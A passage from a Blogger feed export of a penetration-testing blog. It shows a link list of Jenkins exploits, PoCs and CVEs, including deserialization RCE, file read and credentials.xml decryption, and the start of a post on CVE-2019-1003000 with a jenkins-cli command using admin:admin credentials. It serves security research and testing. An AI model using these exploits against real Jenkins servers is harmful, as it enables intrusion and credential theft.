serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EBlog post says: This issue has been fixed in Jenkins version 2.121.1 LTS (2.132 weekly).\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;trebuchet ms\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"http:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html\" target=\"_blank\"\u003Ehttp:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003ECVE-2019-1003000 (https:\/\/jenkins.io\/security\/advisory\/2019-01-08\/#SECURITY-1266)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;trebuchet ms\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/github.com\/Coalfire-Research\/java-deserialization-exploits\/tree\/master\/Jenkins\" target=\"_blank\"\u003Ehttps:\/\/github.com\/Coalfire-Research\/java-deserialization-exploits\/tree\/master\/Jenkins\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/www.contrastsecurity.com\/security-influencers\/serialization-must-die-act-2-xstream\" target=\"_blank\"\u003Ehttps:\/\/www.contrastsecurity.com\/security-influencers\/serialization-must-die-act-2-xstream\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003ECVE-2015-8103 \u0026amp; CVE-2016-0792\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;trebuchet ms\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/github.com\/nixawk\/labs\/tree\/master\/CVE-2017-1000353\" target=\"_blank\"\u003Ehttps:\/\/github.com\/nixawk\/labs\/tree\/master\/CVE-2017-1000353\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/github.com\/vulhub\/vulhub\/tree\/master\/jenkins\/CVE-2017-1000353\" target=\"_blank\"\u003Ehttps:\/\/github.com\/vulhub\/vulhub\/tree\/master\/jenkins\/CVE-2017-1000353\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/www.twistlock.com\/2017\/06\/18\/jenkins-java-deserialization\/\" target=\"_blank\"\u003Ehttps:\/\/www.twistlock.com\/2017\/06\/18\/jenkins-java-deserialization\/\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003ECVE-2017-1000353 PoC\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/cloud.tencent.com\/developer\/article\/1165414\" target=\"_blank\"\u003Ehttps:\/\/cloud.tencent.com\/developer\/article\/1165414\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/github.com\/anntsmart\/CVE\" target=\"_blank\"\u003Ehttps:\/\/github.com\/anntsmart\/CVE\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003ECVE-2018-1999002 (windows) Arbitrary file read\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\n\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EA arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework.\u0026nbsp;\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EUnder Windows, directories that don't exist can be traversed by ..\/, but not for Linux. Then this vulnerability can be read by any file under Windows. Under Linux, you need to have a directory with _ in the Jenkins plugins directory.\u003C\/span\u003E\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/www.crowdstrike.com\/blog\/your-jenkins-belongs-to-us-now-abusing-continuous-integration-systems\/\" target=\"_blank\"\u003Ehttps:\/\/www.crowdstrike.com\/blog\/your-jenkins-belongs-to-us-now-abusing-continuous-integration-systems\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/www.n00py.io\/2017\/01\/compromising-jenkins-and-extracting-credentials\/\" target=\"_blank\"\u003Ehttps:\/\/www.n00py.io\/2017\/01\/compromising-jenkins-and-extracting-credentials\/\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EDecrypting credentials.xml\u0026nbsp;\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/leonjza.github.io\/blog\/2015\/05\/27\/jenkins-to-meterpreter---toying-with-powersploit\/\" target=\"_blank\"\u003Ehttps:\/\/leonjza.github.io\/blog\/2015\/05\/27\/jenkins-to-meterpreter---toying-with-powersploit\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins, windows, powershell\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/securitynews.sonicwall.com\/xmlpost\/jenkins-ci-server-at-risk-high-risk-vulnerbaility\/\" target=\"_blank\"\u003Ehttps:\/\/securitynews.sonicwall.com\/xmlpost\/jenkins-ci-server-at-risk-high-risk-vulnerbaility\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/www.zdnet.com\/article\/thousands-of-jenkins-servers-will-let-anonymous-users-become-admins\/\" target=\"_blank\"\u003Ehttps:\/\/www.zdnet.com\/article\/thousands-of-jenkins-servers-will-let-anonymous-users-become-admins\/\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/www.cyberark.com\/threat-research-blog\/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities\/\" target=\"_blank\"\u003Ehttps:\/\/www.cyberark.com\/threat-research-blog\/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities\/\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003ECVE-2018-1999001\u0026nbsp;\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003Emalformed request moves the config.xml file, after restart anyone can log in - couple it with a DoS (CVE-2018-1999043) to force restart\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cul\u003E\n\u003Cli\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins weekly up to and including 2.132\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins LTS up to and including 2.121.1\u003C\/span\u003E\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\n\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Ch4\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cb\u003ECG Posts:\u003C\/b\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/h4\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-messing-with-new-exploits-pt1.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-messing-with-new-exploits-pt1.html\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EUsername enumeration Jenkins 2.137 and below\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-security-200-cve-2015-5323-poc.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-security-200-cve-2015-5323-poc.html\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins -\u0026nbsp;SECURITY-200 \/ CVE-2015-5323 PoC (\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EAPI tokens of other users available to admins)\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-security-180cve-2015-1814-poc.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-security-180cve-2015-1814-poc.html\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins - SECURITY-180\/CVE-2015-1814 PoC (Forced Token Change)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-decrypting-credentialsxml.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-decrypting-credentialsxml.html\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EDecrypting Jenkins credentials.xml\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/03\/jenkins-cve-2018-1000600-poc.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/03\/jenkins-cve-2018-1000600-poc.html\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins - CVE\u003C\/span\u003E\u003C\/span\u003E\u003Cspan style=\"color: #444444; font-family: times, times new roman, serif;\"\u003E-2018-1000600 SSRF in GitHub\u0026nbsp;plugin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;trebuchet ms\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-messing-with-exploits-pt2-cve.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-messing-with-exploits-pt2-cve.html\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins - CVE-2019-1003000 Pt 1\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/03\/jenkins-messing-with-exploits-pt3-cve.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/03\/jenkins-messing-with-exploits-pt3-cve.html\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins - CVE-2019-1003000 Pt 2 - Orange Tsai exploit\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/03\/jenkins-identify-ip-addresses-of-nodes.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/03\/jenkins-identify-ip-addresses-of-nodes.html\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins -\u0026nbsp;Identify IP Addresses of nodes\u003C\/span\u003E\u003C\/div\u003E\n"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/7662540982988985472\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=7662540982988985472","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/7662540982988985472"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/7662540982988985472"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/02\/jenkins-master-post.html","title":"Jenkins Master Post"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-8614793690517339202"},"published":{"$t":"2019-02-27T15:23:00.000-05:00"},"updated":{"$t":"2019-02-27T20:26:57.124-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - messing with exploits pt2 - CVE-2019-1003000"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444;\"\u003EAfter the release of \u003Ca href=\"https:\/\/twitter.com\/orange_8361\/status\/1097829220485496832\" target=\"_blank\"\u003EOrange Tsai's exploit\u003C\/a\u003E for Jenkins. I've been doing some poking. PreAuth RCE against Jenkins is something everyone wants.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EWhile not totally related to the blog post and tweet the following exploit came up while searching.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EWhat I have figured out that is important is the plug versions as it relates to these latest round of Jenkins exploits.\u0026nbsp; TBH I never paid much attention to the plugins in the past as the issues have been with core Jenkins (as was the first blog post) but you can get a look at them by going to \u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ejenkins-server\/pluginManager\/installed\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-OasO2i-fRPQ\/XHbpJ6aXnfI\/AAAAAAAACak\/husg5qpMErEfMXpRx9HYdrNr7V327nTSACLcBGAs\/s1600\/Screen%2BShot%2B2019-02-27%2Bat%2B2.45.35%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"858\" data-original-width=\"1600\" height=\"213\" src=\"https:\/\/1.bp.blogspot.com\/-OasO2i-fRPQ\/XHbpJ6aXnfI\/AAAAAAAACak\/husg5qpMErEfMXpRx9HYdrNr7V327nTSACLcBGAs\/s400\/Screen%2BShot%2B2019-02-27%2Bat%2B2.45.35%2BPM.png\" width=\"400\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003E\u003Cspan style=\"color: #444444;\"\u003EJenkins plugin manager\u003C\/span\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003EIt does require admin permissions or you get this:\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/4.bp.blogspot.com\/-vUobB5vorME\/XHbpnX16yHI\/AAAAAAAACas\/EaXdhhn5_Kku_AJhNNdl94d0797LSPLZwCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-27%2Bat%2B2.44.58%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cspan style=\"color: black;\"\u003E\u003Cimg border=\"0\" data-original-height=\"482\" data-original-width=\"1490\" height=\"128\" src=\"https:\/\/4.bp.blogspot.com\/-vUobB5vorME\/XHbpnX16yHI\/AAAAAAAACas\/EaXdhhn5_Kku_AJhNNdl94d0797LSPLZwCLcBGAs\/s400\/Screen%2BShot%2B2019-02-27%2Bat%2B2.44.58%2BPM.png\" width=\"400\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003E\u003Cspan style=\"color: #444444;\"\u003ENo permissions for Jenkins plugin manager\u003C\/span\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003EIf you do have permissions you can also hit it with the jenkins-cli client and pull the info\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E$ java -jar jenkins-cli.jar -s http:\/\/10.0.0.166:8080\/ -auth admin:admin list-plugins\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ejsch\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;JSch dependency plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0.1.55\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Estructs\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Structs Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 